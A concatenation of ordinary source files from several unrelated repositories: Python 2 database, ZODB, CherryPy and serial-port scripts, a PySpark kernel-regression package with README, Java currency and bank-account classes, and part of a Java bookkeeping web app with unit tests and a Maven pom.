curs.execute("""Drop TABLE operations""")
curs.execute("""CREATE TABLE operations (id SERIAL PRIMARY KEY,Nomclient varchar(200),IdClient varchar(200),NomOperation varchar(200),Date varchar(100))""")
#curs.execute("""Drop TABLE adresses""")
curs.execute("""CREATE TABLE adresses (id SERIAL PRIMARY KEY, idoperation varchar(200),colonne1 varchar(200),colonne2 varchar(200),colonne3 varchar(200),colonne4 varchar(200),colonne5 varchar(200),colonne6 varchar(200),colonne7 varchar(200),colonne8 varchar(200),colonne9 varchar(200),colonne10 varchar(200),colonne11 varchar(200),colonne12 varchar(200),colonne13 varchar(200),colonne14 varchar(200),colonne15 varchar(200),colonne16 varchar(200),colonne17 varchar(200),colonne18 varchar(200),colonne19 varchar(200),colonne20 varchar(200))""")
conn.commit()
conn.close()
print "FINIT"<file_sep>from ZODB import FileStorage, DB
import transaction
test = """ storage = FileStorage.FileStorage('test-filestorage.fs')
db = DB(storage)
connection = db.open()
root = connection.root()
root['employees'] = ['Mary', 'Jo', 'Bob']
transaction.commit()
k = root.items()
for l in k :
print l
connection.close()
"""
from persistent import Persistent
class User(Persistent):
pass
storage = FileStorage.FileStorage('test-filestorage.fs')
db = DB(storage)
connection = db.open()
root = connection.root()
newuser = User()
neuser = User()
test = User()
newuser.id = 'amk'
neuser.id = 'ak'
newuser.first_name = 'Andrew'
neuser.first_name = 'Andre'
newuser.last_name = 'Kuchling'
neuser.last_name = 'Kuch'
root[newuser.id] = newuser
root[neuser.id] = neuser
transaction.commit()
print root.items()
test = root['amk']
k = root.items()
for l in k :
print l[1].first_name
print test.first_name
connection.close()
<file_sep>import cherrypy,os
current_dir = os.path.dirname(os.path.abspath(__file__))
settings = {
'/img':{'tools.staticdir.on':True,
'tools.staticdir.dir':r'img'}
}
class header_begin:
def __init__(self):
self.header = "<body>"
def printh(self):
return self.header
class header_end:
def __init__(self):
self.header = "</body>"
def printh(self):
return self.header
class write_page:
def __init__(self):
self.page = """
<table width=100% height=100%>
<tr width=100% height=100%>
<td width=100% height=100%>
Bussiere<br>
Python Programmer for hire2<br>
web site : <a href="http://www.bussieresama.net">http://www.bussieresama.net</a><br>
<img src="img/bussiere.jpg">
</td>
</tr>
</table>
"""
class root:
def __init__(self):
pass
nom = ""
passwd = ""
def doLogin(self, username=None, password=None):
self.nom = username
self.passwd = password
return self.page()
def index(self,username=None,password=None):
return self.page()
index.exposed = True
doLogin.exposed = True
def page(self):
h1 = header_begin()
h2 = header_end()
pagewrite = write_page()
page = pagewrite.page
page = "%s %s %s %s %s" %(h1.printh(),page,self.nom,self.passwd,h2.printh())
return page
cherrypy.config.update({'tools.staticdir.root':r'%s'%current_dir})
cherrypy.config.update({'environment': 'production','log.screen': True})
cherrypy.config.update({'server.socket_port' : 664})
cherrypy.quickstart(root(),config=settings)
<file_sep>import cherrypy
class Config():
def getConfig(self):
settings = {
'global':{
'server.socket_port' : 80
}
}
return settings
<file_sep>import serial,threading,time #importe le module serial pour communiquer avec la voie serie
serhdl = serial.Serial(0) # ouvre le com1
serhdl.open()
class T (threading.Thread) :
def __init__(self) :
threading.Thread.__init__(self)
self.a = 0
def run(self) :
while(True):
output = ord(serhdl.read())
if (output != ""):
self.a+=1
else :
self.a = 0
print "valeur lue chiffre",output
print "valeur lue chiffre \"modulo 43\" : ",output %43
print "compteur",self.a
print "valeur lue car",chr(output)
print "\n"
t = T()
t.start()
<file_sep>[Picasa]
name=bledsheim
description=
date=38211.787465
category=My Albums
| 5ed1aeead368945454b595dfc71ca5e027112719 | [
"Python",
"INI"
] | 9 | Python | bussiere/bussierelab | 07fdf05ddbf3395ec471dd150d887b74c667aadd | 446c41f42291b67290301a185c3ca74e424b90a3 |
refs/heads/master | <file_sep>from setuptools import setup
setup(name='ApplyKernel',
version='0.1',
description='A Phyton (PySpark) Package to extend linear mllib regression models to process non-linear data using Kernels.',
url='https://github.com/heikowagner/ApplyKernel',
author='<NAME>',
author_email='<EMAIL>',
license='Apache 2.0',
packages=['ApplyKernel'],
zip_safe=False)<file_sep># ApplyKernel
A Python (PySpark) Package to extend linear mllib regression models to process non-linear data using Kernels.
Install the package via:
```
pip install git+https://github.com/heikowagner/ApplyKernel.git
```
# Theoretical Insights
The theoretical foundation for the kernel method can be found at https://www.thebigdatablog.com/non-linear-support-vector-machines-svm-in-spark/ implementation details at https://www.thebigdatablog.com/non-linear-classification-methods-in-spark/.
# Usage
To train a model:
`TrainedModel= ApplyKernel(<Model>, <Kernel>, <Bandwidth>).train(<LabeledPointVector>)`.
For prediction:
`TrainedModel.predict(<FeatureVector>)`.
##Example:
```python
from ApplyKernel import ApplyKernel, RadialKernel
import numpy as np
import matplotlib.pyplot as plt
##Generate data
#Simulation
N=500
Y= np.random.randint(0,2,N)
degree=np.random.normal(0,1,N)*2*np.pi
X= [0+ (0.5 + Y*0.5)* np.cos(degree)+ np.random.normal(0,2,N)*0.05, 0 + (0.5 + Y*0.5)*np.sin(degree)+ np.random.normal(0,2,N)*0.05 ]
#plot data
plt.scatter(X[0], X[1], c=Y)
plt.show()
#Create LabeledPoint Vector
from pyspark.mllib.regression import LabeledPoint
X_par=sc.parallelize(np.transpose(X)).zipWithIndex().map(lambda(x,y) : (y,x) )
Y_par=sc.parallelize(np.transpose(Y)).zipWithIndex().map(lambda(x,y) : (y,x) )
Y_X= Y_par.join(X_par).map(lambda(y,x) : LabeledPoint(x[0], x[1]) )
from pyspark.mllib.regression import LinearRegressionModel, LinearRegressionWithSGD
from pyspark.mllib.classification import LogisticRegressionWithLBFGS, LogisticRegressionModel
from pyspark.mllib.classification import SVMModel, SVMWithSGD
##Train the Models
#KernelRegression= ApplyKernel(LinearRegressionWithSGD, RadialKernel, 0.5).train(Y_X)
#KernelLogit= ApplyKernel(LogisticRegressionWithLBFGS, RadialKernel, 0.5).train(Y_X)
KernelSVM= ApplyKernel(SVMWithSGD, RadialKernel, 0.5).train(Y_X)
##Simulate Test Set
N=200
Y_test= np.array( np.random.randint(0,2,N) )
degree=np.random.normal(0,1,N)*2*np.pi
X_test= np.array( [0+ (0.5 + Y_test*0.5)* np.cos(degree)+ np.random.normal(0,2,N)*0.05, 0 + (0.5 + Y_test*0.5)*np.sin(degree)+ np.random.normal(0,2,N)*0.05 ])
X_par= sc.parallelize( X_test.transpose() )
##Predict Group
Preds = KernelSVM.predict(X_par)
##Evaluate Model
sc_Y=sc.parallelize( Y_test ).zipWithIndex().map(lambda (x,y): (y,x))
labelsAndPreds=Preds.zipWithIndex().map(lambda (x,y): (y,x)).join( sc_Y ).map(lambda (x,y): y)
testErr = labelsAndPreds.filter(lambda (x,y): y != x).count() / float(labelsAndPreds.count())
print("Training Error = " + str(testErr))
plt.scatter(X_test[0], X_test[1], c=Preds.collect() )
plt.show()
```
<file_sep>from pyspark.mllib.regression import LabeledPoint
import numpy as np
def RadialKernel(x,y,sigma):
return np.exp(-sum((x-y)**2)/(2*sigma**2))
def construct_K(Y_X,lamb,kernel, X_1=None):
sp_X=Y_X.map(lambda x: x.features.toArray()).zipWithIndex()
if X_1!=None:
sp_X_1=X_1.zipWithIndex()
else:
sp_X_1=sp_X
sp_Y=Y_X.map(lambda x: x.label).zipWithIndex().map(lambda(x,y) : (y,x) )
grid=sp_X_1.cartesian(sp_X)
K=grid.map(lambda(x,y) : (x[1],kernel(x[0],y[0],lamb)) )
return [sp_Y, K]
def construct_labeled(Y,K):
def add_element(acc,x):
if type(acc[1]) == list:
return (min(acc[0],x[0]), acc[1] + [x[1]] )
else:
return (min(acc[0],x[0]), [acc[1]] + [x[1]] )
jnd=Y.join(K).reduceByKey(lambda acc, x : add_element(acc,x) ).cache()
labeled=jnd.map(lambda(y,x) : LabeledPoint(x[0], x[1]) )
order=jnd.map(lambda (y,x): y)
jnd.unpersist()
return [labeled, order]
class ApplyKernel:
def __init__(self, method, kernel, lambd):
self.method = method
self.lambd = lambd
self.trained = None
self.Y_X_dat= None
self.kernel=kernel
def train(self, data, **kwargs):
data_K= construct_K(data, self.lambd, self.kernel)
self.Y_X_dat=data.cache()
new_data=construct_labeled(data_K[0],data_K[1])
self.trained=self.method.train( new_data[0] ,**kwargs)
return self
def predict(self, data, **kwargs):
data_K= construct_K(self.Y_X_dat, self.lambd, self.kernel, data)
l_dat=construct_labeled(data_K[0], data_K[1])
pred= self.trained.predict( l_dat[0].map(lambda p: p.features.toArray()), **kwargs )
return l_dat[1].zip(pred).sortByKey().map(lambda (x,y): y)
| 56c31b589009b8d287e10170688ef75fa7c60ed3 | [
"Markdown",
"Python"
] | 3 | Python | heikowagner/ApplyKernel | e6f3410972145e7eee1fdce49e1961081dec4836 | bebc3458fec3c7458006175e450e0b5aefaaccc6 |
refs/heads/master | <file_sep>(function () {
"use strict";
this.console.log("...");
}).apply(this); | 561fa40d9980c71dfa05f8d5b19b9a7a4cd31c4d | [
"JavaScript"
] | 1 | JavaScript | sentenzo/adAstra | 5ee048d55fc0daf8e5fee3107dd46c03fae539ff | caf3cebfcd8173e46b64cd5cb68bc0eccd16fdba |
refs/heads/master | <file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package atividade1;
/**
*
* @author <NAME> 12.02643-3
* @author <NAME> 12.01595-4
*/
public class Dinheiro {
//atributos
private double valor;
private String moeda;
public static double taxaEuroDolar = 0.9249;
public static double taxaRealDolar = 3.08;
//setters
private boolean setMoeda(String M) {
if (M.equals("real") || M.equals("euro") || M.equals("dolar")) {
this.moeda = M;
System.out.println("Moeda alterada com sucesso");
return true;
}
return false;
}
public static boolean alterarTaxaRealDolar(double t) {
Dinheiro.taxaRealDolar = t;
return true;
}
public static boolean alterarTaxaEuroDolar(double t) {
Dinheiro.taxaEuroDolar = t;
return true;
}
public boolean setValor(double v){
if(this.moeda.equals("real")){
this.valor = v;
}
else{
if (this.moeda.equals("dolar")){
this.valor = this.realParaDolar(v);
}
else {
this.valor = this.realParaEuro(v);
}
}
return true;
}
//Constructor
public Dinheiro(double v, String m){
this.valor = v;
this.moeda = m;
}
//getters
public double getTaxaRealDolar() {
return Dinheiro.taxaRealDolar;
}
public double getTaxaEuroDolar() {
return Dinheiro.taxaEuroDolar;
}
public String getMoeda() {
return this.moeda;
}
public double getValor(){
return this.valorEmReal();
}
//methods
public static double realParaDolar(double r){
return r/Dinheiro.taxaRealDolar;
}
public static double dolarParaReal(double d){
return d*Dinheiro.taxaRealDolar;
}
public static double euroParaDolar(double e){
return e/Dinheiro.taxaEuroDolar;
}
public static double dolarParaEuro(double d){
return d*Dinheiro.taxaEuroDolar;
}
public static double euroParaReal(double e){
return Dinheiro.dolarParaReal(Dinheiro.euroParaDolar(e));
}
public static double realParaEuro(double r){
return Dinheiro.dolarParaEuro(Dinheiro.realParaDolar(r));
}
private double valorEmReal(){
if(this.moeda.equals("real")){
return this.valor;
}
else{
if (this.moeda.equals("dolar")){
return this.dolarParaReal(this.valor);
}
else {
return this.euroParaReal(this.valor);
}
}
}
private double valorEmDolar(){
if(this.moeda.equals("dolar")){
return this.valor;
}
else{
if (this.moeda.equals("real")){
return this.realParaDolar(this.valor);
}
else {
return this.euroParaDolar(this.valor);
}
}
}
private double valorEmEuro(){
if(this.moeda.equals("euro")){
return this.valor;
}
else{
if (this.moeda.equals("dolar")){
return this.dolarParaEuro(this.valor);
}
else {
return this.realParaEuro(this.valor);
}
}
}
}
<file_sep># HelloWorld
teste da aula
<file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package atividade1;
/**
*
* @author <NAME> 12.02643-3
* @author <NAME> 12.01595-4
*/
public class Atividade1 {
/**
* @param args the command line arguments
*/
public static void main(String[] args) {
Conta c1 = new Conta("111","111.111-11","Amilton","Dias","04385745602",1000,250,"real");
Conta c2 = new Conta("222","222.222-22","Henrique","Diniz","04385745456",3000,1000,"dolar");
Conta c3 = new Conta("333","333.333-33","Leonardo","Nomo","34585745456",200,12000,"euro");
Conta c4 = new Conta("444","444.444-44","Alberto","Roberto","04385723456",1800,0,"real");
c2.transferirPara(c1, 700);
c2.transferirPara(c3, 2000);
c1.exibirTodasInformacoesDaConta();
c2.exibirTodasInformacoesDaConta();
c3.exibirTodasInformacoesDaConta();
c1.sacar(1800);
c1.transferirPara(c4, 200);
c1.exibirTodasInformacoesDaConta();
c4.exibirTodasInformacoesDaConta();
c3.transferirPara(c4, 10000);
c3.transferirPara(c2, 1000);
c2.exibirTodasInformacoesDaConta();
c4.exibirTodasInformacoesDaConta();
}
}
| 64cda8f1d88751d941f594f42b0fb42e35233c32 | [
"Markdown",
"Java"
] | 3 | Java | FeTPiva/HelloWorld | 9b466c37dd66c41cda67026c97b2955ceaca4853 | 02c26e1f3ff4e26d48e9d280ea94034856c93296 |
refs/heads/master | <file_sep>package org.elasticsearch.spark.rdd;
import java.lang.reflect.Field;
import org.apache.commons.logging.Log;
import org.apache.spark.SparkConf;
import org.apache.spark.TaskContext;
import org.apache.spark.util.TaskCompletionListener;
import org.elasticsearch.hadoop.util.ObjectUtils;
import org.elasticsearch.hadoop.util.ReflectionUtils;
import scala.Function0;
import scala.runtime.AbstractFunction0;
import scala.runtime.BoxedUnit;
abstract class CompatUtils {
private static final boolean SPARK_11_AVAILABLE = ObjectUtils.isClassPresent("org.apache.spark.util.TaskCompletionListener", SparkConf.class.getClassLoader());
//public static final boolean SPARK_12_AVAILABLE = ObjectUtils.isClassPresent("org.apache.spark.sql.catalyst.types.BinaryType", SparkConf.class.getClassLoader());
private static final Class<?> SCHEMA_RDD_LIKE_CLASS;
static {
Class<?> clz = null;
try {
clz = Class.forName("org.apache.spark.sql.SchemaRDDLike", false, CompatUtils.class.getClassLoader());
} catch (Exception ex) {
// ignore
}
SCHEMA_RDD_LIKE_CLASS = clz;
}
private static abstract class Spark10TaskContext {
private static Field INTERRUPTED_FIELD;
static {
Field field = ReflectionUtils.findField(TaskContext.class, "interrupted");
ReflectionUtils.makeAccessible(field);
INTERRUPTED_FIELD = field;
}
static void addOnCompletition(TaskContext taskContext, final Function0<?> function) {
taskContext.addOnCompleteCallback(new AbstractFunction0() {
@Override
public BoxedUnit apply() {
function.apply();
return BoxedUnit.UNIT;
}
});
}
static boolean isInterrupted(TaskContext taskContext) {
return ReflectionUtils.getField(INTERRUPTED_FIELD, taskContext);
}
}
private static abstract class Spark11TaskContext {
static void addOnCompletition(TaskContext taskContext, final Function0<?> function) {
taskContext.addTaskCompletionListener(new TaskCompletionListener() {
@Override
public void onTaskCompletion(TaskContext context) {
function.apply();
}
});
}
static boolean isInterrupted(TaskContext taskContext) {
return taskContext.isInterrupted();
}
}
static void addOnCompletition(TaskContext taskContext, Function0<?> function) {
if (SPARK_11_AVAILABLE) {
Spark11TaskContext.addOnCompletition(taskContext, function);
}
else {
Spark10TaskContext.addOnCompletition(taskContext, function);
}
}
static boolean isInterrupted(TaskContext taskContext) {
return (SPARK_11_AVAILABLE ? Spark11TaskContext.isInterrupted(taskContext) : Spark10TaskContext.isInterrupted(taskContext));
}
static void warnSchemaRDD(Object rdd, Log log) {
if (rdd != null && SCHEMA_RDD_LIKE_CLASS != null) {
if (SCHEMA_RDD_LIKE_CLASS.isAssignableFrom(rdd.getClass())) {
log.warn("basic RDD saveToEs() called on a Spark SQL SchemaRDD; typically this is a mistake(as the SQL schema will be ignored). Use 'org.elasticsearch.spark.sql' package instead");
}
}
}
} | 68869832fcf6141f93f930118b2f14dceb0a2297 | [
"Java"
] | 1 | Java | Gavin-Yang/elasticsearch-hadoop | e0aabd9d754e010e710e645340c0fae9020208e0 | fd8427dba6a9b5418c2f2a93c37b212326b5c4f6 |
refs/heads/master | <file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.ClientServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
public class LoginController extends AbstractController {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
req.getRequestDispatcher("login.ftl").forward(req, resp);
}
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
ClientService clientService = new ClientServiceImpl();
String login = req.getParameter("login");
String password = req.getParameter("password");
Client client = clientService.find(login, password);
if (client != null) {
req.getSession().setAttribute("login", login);
resp.sendRedirect("/home");
} else {
String error = "Неверный логин или пароль";
req.setAttribute("error", error);
req.getRequestDispatcher("login.ftl").forward(req, resp);
}
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service;
import org.junit.Test;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.CategoryDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.ClientDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.RecordDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Coordinate;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Record;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums.Type;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.RecordServiceImpl;
import java.sql.Date;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.mockito.Matchers.anyString;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
public class RecordServiceImplTest {
@Test
public void testCreate() {
Record record = new Record(0L, 0L, 0L, Type.INCOME, 100, "description", Date.valueOf("2016-01-01"));
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.add(record)).thenReturn(0L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
assertEquals(0L, recordService.create(record));
}
@Test
public void testGetByClientLogin() {
List<Record> records = new LinkedList<>();
records.add(new Record(0L, 0L, 0L, Type.INCOME, 100, "description", Date.valueOf("2016-01-01")));
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
CategoryDao categoryDao = mock(CategoryDao.class);
List<Category> categories = new LinkedList<>();
categories.add(new Category(0L, "category0"));
categories.add(new Category(1L, "category1"));
when(categoryDao.get(0L)).thenReturn(categories.get(0));
when(categoryDao.get(1L)).thenReturn(categories.get(1));
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getAll(0L)).thenReturn(records);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(records, recordService.get(anyString()));
}
@Test
public void testGetBalance() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getCurrentBalance(0L)).thenReturn(0L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(0L, recordService.getBalance(anyString()).longValue());
}
@Test
public void testGetMonthlyIncome() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getMonthlyIncome(0L, 1)).thenReturn(0L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(0L, recordService.getMonthlyIncome(anyString(), 1).longValue());
}
@Test
public void testGetIncomeList() {
List<Record> records = new LinkedList<>();
records.add(new Record(0L, 0L, 0L, Type.INCOME, 100, "description", Date.valueOf("2016-01-01")));
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
CategoryDao categoryDao = mock(CategoryDao.class);
List<Category> categories = new LinkedList<>();
categories.add(new Category(0L, "category0"));
categories.add(new Category(1L, "category1"));
when(categoryDao.get(0L)).thenReturn(categories.get(0));
when(categoryDao.get(1L)).thenReturn(categories.get(1));
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getIncomeList(0L)).thenReturn(records);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(records, recordService.getIncomeList(anyString()));
}
@Test
public void testGetExpenditureList() {
List<Record> records = new LinkedList<>();
records.add(new Record(0L, 1L, 0L, Type.EXPENDITURE, 100, "description", Date.valueOf("2016-01-01")));
Client client = mock(Client.class);
when(client.getId()).thenReturn(1L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
CategoryDao categoryDao = mock(CategoryDao.class);
List<Category> categories = new LinkedList<>();
categories.add(new Category(0L, "category0"));
categories.add(new Category(1L, "category1"));
when(categoryDao.get(0L)).thenReturn(categories.get(0));
when(categoryDao.get(1L)).thenReturn(categories.get(1));
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getExpenditureList(1L)).thenReturn(records);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(records, recordService.getExpenditureList(anyString()));
}
@Test
public void testGetMonthlyExpenditure() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getMonthlyExpenditure(0L, 1)).thenReturn(0L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(0L, recordService.getMonthlyExpenditure(anyString(), 1).longValue());
}
@Test
public void testRemoveTrue() {
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.remove(0L)).thenReturn(true);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
assertTrue(recordService.remove(0L));
}
@Test
public void testRemoveFalse() {
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.remove(0L)).thenReturn(false);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
assertFalse(recordService.remove(0L));
}
@Test
public void testGetMonthlyIncomeData() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
CategoryDao categoryDao = mock(CategoryDao.class);
List<Category> categories = new LinkedList<>();
categories.add(new Category(0L, "category0"));
categories.add(new Category(1L, "category1"));
when(categoryDao.getAll()).thenReturn(categories);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getMonthlyIncomeForCategory(0L, 0L, 1)).thenReturn(100L);
when(recordDao.getMonthlyIncomeForCategory(0L, 1L, 1)).thenReturn(200L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
Map<String, Long> data = new HashMap<>();
data.put("category0", 100L);
data.put("category1", 200L);
assertEquals(data,recordService.getMonthlyIncomeData(anyString(), 1));
}
@Test
public void testGetMonthlyExpenditureData() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
CategoryDao categoryDao = mock(CategoryDao.class);
List<Category> categories = new LinkedList<>();
categories.add(new Category(0L, "category0"));
categories.add(new Category(1L, "category1"));
when(categoryDao.getAll()).thenReturn(categories);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getMonthlyExpenditureForCategory(0L, 0L, 1)).thenReturn(100L);
when(recordDao.getMonthlyExpenditureForCategory(0L, 1L, 1)).thenReturn(200L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
Map<String, Long> data = new HashMap<>();
data.put("category0", 100L);
data.put("category1", 200L);
assertEquals(data,recordService.getMonthlyExpenditureData(anyString(), 1));
}
@Test
public void testGetTotalIncome() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getTotalIncome(0L)).thenReturn(200L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(200L,recordService.getTotalIncome(anyString()).longValue());
}
@Test
public void testGetTotalExpenditure() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getTotalExpenditure(0L)).thenReturn(200L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(200L,recordService.getTotalExpenditure(anyString()).longValue());
}
@Test
public void testGetTotalAverageIncome() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getTotalAverageIncome(0L)).thenReturn(200L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(200L,recordService.getTotalAverageIncome(anyString()).longValue());
}
@Test
public void testGetTotalAverageExpenditure() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getTotalAverageExpenditure(0L)).thenReturn(200L);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(200L,recordService.getTotalAverageExpenditure(anyString()).longValue());
}
@Test
public void testGetTotalMonthlyBalanceData() {
Client client = mock(Client.class);
when(client.getId()).thenReturn(0L);
ClientDao clientDao = mock(ClientDao.class);
when(clientDao.get(anyString())).thenReturn(client);
List<Coordinate> data = new LinkedList<>();
data.add(new Coordinate("", 0L));
RecordDao recordDao = mock(RecordDao.class);
when(recordDao.getTotalMonthlyBalanceData(0L)).thenReturn(data);
RecordService recordService = new RecordServiceImpl();
((RecordServiceImpl) recordService).setRecordDao(recordDao);
((RecordServiceImpl) recordService).setClientDao(clientDao);
assertEquals(data,recordService.getTotalMonthlyBalanceData(anyString()));
}
}
<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper</name>
<packaging>pom</packaging>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
<commons-io.version>2.4</commons-io.version>
<jbcrypt.version>0.3m</jbcrypt.version>
<servlet-api.version>3.1.0</servlet-api.version>
<freemarker.version>2.3.24-incubating</freemarker.version>
<hsqldb.version>2.3.3</hsqldb.version>
<hsqldb.sqltool.version>2.3.3</hsqldb.sqltool.version>
<hikari.version>2.4.3</hikari.version>
<log4j.version>1.2.17</log4j.version>
<junit.version>4.12</junit.version>
<mockito.version>1.10.19</mockito.version>
<powermock.version>1.6.2</powermock.version>
<cargo.version>1.4.18</cargo.version>
</properties>
<modules>
<module>bookkeeper-db</module>
<module>bookkeeper-model</module>
<module>bookkeeper-dao</module>
<module>bookkeeper-service</module>
<module>bookkeeper-webapp</module>
</modules>
<dependencyManagement>
<dependencies>
<!-- Our Modules -->
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.db</groupId>
<artifactId>bookkeeper-db</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model</groupId>
<artifactId>bookkeeper-model</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao</groupId>
<artifactId>bookkeeper-dao</artifactId>
